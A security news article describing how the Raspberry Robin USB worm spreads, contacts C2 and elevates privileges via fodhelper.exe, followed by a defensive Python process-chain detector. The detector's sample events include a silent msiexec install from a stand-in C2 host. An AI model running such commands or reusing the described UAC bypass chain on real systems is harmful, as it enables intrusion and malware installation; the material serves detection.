Raspberry Robin is a Windows worm discovered by researchers that propagates through removable USB devices. Earlier this year we covered an overview of the malware in a separate article.
The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses TOR exit nodes as a backup C2 infrastructure.
Spotted in September 2021, it targets organizations in the technology and manufacturing industries. Initial access is typically through infected removable drives, often USB devices.
The malware uses cmd.exe to read and execute a file stored on the infected external drive. It then leverages msiexec.exe for external network communication to a rogue domain used as C2, from which it downloads and installs a DLL library file.
msiexec.exe then launches a legitimate Windows utility, fodhelper.exe, which in turn runs rundll32.exe to execute a malicious command. Experts pointed out that processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt.
According to the researchers, the threat can be detected by looking for fodhelper.exe as a parent process. The legitimate Windows utilities involved are:
- fodhelper (a trusted binary for managing features in Windows settings),
- msiexec (command line Windows Installer component),
- odbcconf (a tool for configuring ODBC drivers).
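As an added illustration (not code from the original article or from Microsoft's guidance), a small Python detector that applies the process-chain indicators above to constructed Sysmon-style process-creation events; the rule labels, field names and the sample hosts and paths are assumptions.

```python
from __future__ import annotations
import re
from pathlib import PureWindowsPath
from typing import Iterable

# Rules derived from the chain described above (ids are my own labels):
#   R1  any process whose parent is fodhelper.exe (no-prompt elevation path)
#   R2  msiexec.exe whose command line points at a remote http(s) package
#   R3  one of the trusted Windows binaries named on the page spawned by another
LOLBINS = {"fodhelper.exe", "msiexec.exe", "rundll32.exe", "odbcconf.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def _name(image: str) -> str:
    """Lower-cased file name of a Windows image path (empty string if absent)."""
    return PureWindowsPath(image).name.lower() if image else ""

def classify(event: dict) -> list[str]:
    """Return the rule ids a single process-creation event matches."""
    parent, child = _name(event.get("ParentImage", "")), _name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent == "fodhelper.exe":
        hits.append("R1-fodhelper-parent")
    if child == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("R2-msiexec-remote-package")
    if child in LOLBINS and parent in LOLBINS:
        hits.append("R3-lolbin-spawns-lolbin")
    return hits

def scan(events: Iterable[dict]) -> list[tuple[int, list[str]]]:
    """Return (EventId, matched rules) for every event that triggers a rule."""
    return [(e["EventId"], hits) for e in events if (hits := classify(e))]

# Constructed Sysmon-style events (Event ID 1 fields); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c E:\placeholder.cmd"},
    {"EventId": 2, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /q /i http://c2-placeholder.invalid/pkg.msi"},
    {"EventId": 3, "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\fodhelper.exe", "CommandLine": "fodhelper.exe"},
    {"EventId": 4, "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe placeholder.dll,Run"},
    {"EventId": 5, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Installers\vendor.msi /qn"},  # benign local install
]
```

Calling `scan(SAMPLE_EVENTS)` flags events 2, 3 and 4 and leaves the benign local msiexec install (event 5) alone; in practice R2 would be tuned against your own software-deployment traffic before alerting on it.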
Microsoft has now confirmed that the threat was discovered on the networks of multiple customers, including organizations in the technology and manufacturing sectors.
It is believed that Raspberry Robin represents a high risk to organizations because threat actors could use it as an entry point into target networks and to drop additional malicious payloads.